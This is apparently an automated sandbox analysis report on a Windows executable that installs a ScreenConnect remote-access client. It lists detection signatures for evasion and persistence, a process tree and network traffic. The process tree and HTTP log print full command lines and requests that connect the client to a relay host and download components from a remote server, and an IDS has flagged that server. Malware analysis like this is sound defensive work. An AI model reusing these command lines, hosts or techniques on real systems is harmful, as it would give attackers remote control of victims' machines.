Windows Analysis Report
Qjq85KfhBC.exe

Overview

General Information

Sample name: Qjq85KfhBC.exe (renamed because original name is a hash value)
Original sample name: a43cca6cc162e4b68f0844d507f5300216e6ced88af03fabedc1d053d743064d(1).exe
Analysis ID: 1542315
MD5: fdb2a84ffcb57c0bfbbf0aadb9bad790
SHA1: f3333b1aff0e5cafd2bbb96457165f231d0dc73e
SHA256: a43cca6cc162e4b68f0844d507f5300216e6ced88af03fabedc1d053d743064d
Tags: exe, secure-stansup-com, user-JAMESWT_MHT

Detection

ScreenConnect Tool
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Deletes keys which are related to windows safe boot (disables safe mode boot)
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • Qjq85KfhBC.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\Qjq85KfhBC.exe" MD5: FDB2A84FFCB57C0BFBBF0AADB9BAD790)
    • dfsvc.exe (PID: 7740 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 4228 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
        • ScreenConnect.ClientService.exe (PID: 2788 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • WerFault.exe (PID: 5808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 8052 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 8164 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6780 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5920 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 2924 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • ScreenConnect.WindowsClient.exe (PID: 3544 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "bd7f42b5-0144-4d3f-871e-9605118ce260" "User" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 7740 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4228 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
10.0.ScreenConnect.WindowsClient.exe.f70000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                  System Summary

                  Source: Network Connection | Author: Nasreddine Bencherchali (Nextron Systems) | Data: DestinationIp: 192.168.2.10, DestinationIsIpv6: false, DestinationPort: 49702, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7740, Protocol: tcp, SourceIp: 79.110.49.185, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 8052, ProcessName: svchost.exe

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-10-25T19:27:26.419007+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.10 | 49719 | TCP
                  2024-10-25T19:27:28.274313+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.10 | 49720 | TCP
                  2024-10-25T19:27:33.433121+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.10 | 49725 | TCP
                  2024-10-25T19:27:35.115074+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.10 | 49726 | TCP
                  2024-10-25T19:27:37.540288+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.10 | 49727 | TCP
                  2024-10-25T19:27:43.542452+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.10 | 49728 | TCP
                  2024-10-25T19:27:45.189390+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.10 | 49729 | TCP
                  2024-10-25T19:27:48.935077+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.10 | 49730 | TCP

                  AV Detection

                  Source: Qjq85KfhBC.exe | ReversingLabs: Detection: 23%
                  Source: Submited Sample | Integrated Neural Analysis Model: Matched 92.6% probability
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe | Code function: 0_2_00911000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00911000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe

                  Compliance

                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: Qjq85KfhBC.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Qjq85KfhBC.exe | Static PE information: certificate valid
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49702 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49722 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49724 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49725 version: TLS 1.2
                  Source: Qjq85KfhBC.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD045E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754070448.0000000003192000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Qjq85KfhBC.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1751348890.00000000028B2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801490320.0000000000A00000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801752921.0000000002371000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0459000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1746175127.000000000011D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0459000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD045E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754070448.0000000003192000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02A8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1751788668.0000000004F72000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe | Code function: 0_2_00914A4B FindFirstFileExA,0_2_00914A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\

                  Networking

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe | Registry value created: NULL Service
                  Source: global traffic | TCP traffic: 192.168.2.10:49732 -> 79.110.49.185:8041
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 | Host: secure.stansup.com | Accept-Encoding: gzip
                  Source: Joe Sandbox View | IP Address: 79.110.49.185
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49725
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49726
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49720
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49727
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49728
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49729
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49719
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49730
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | DNS traffic detected: DNS query: secure.stansup.com
                  Source: global traffic | DNS traffic detected: DNS query: kjh231a.zapto.org
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2240874831.0000021CEA99E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: svchost.exe, 00000008.00000002.2606460668.000001E11BE13000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2238360883.0000021CE8AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f65b439
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-
                  Source: svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd0
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
                  Source: svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdng
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
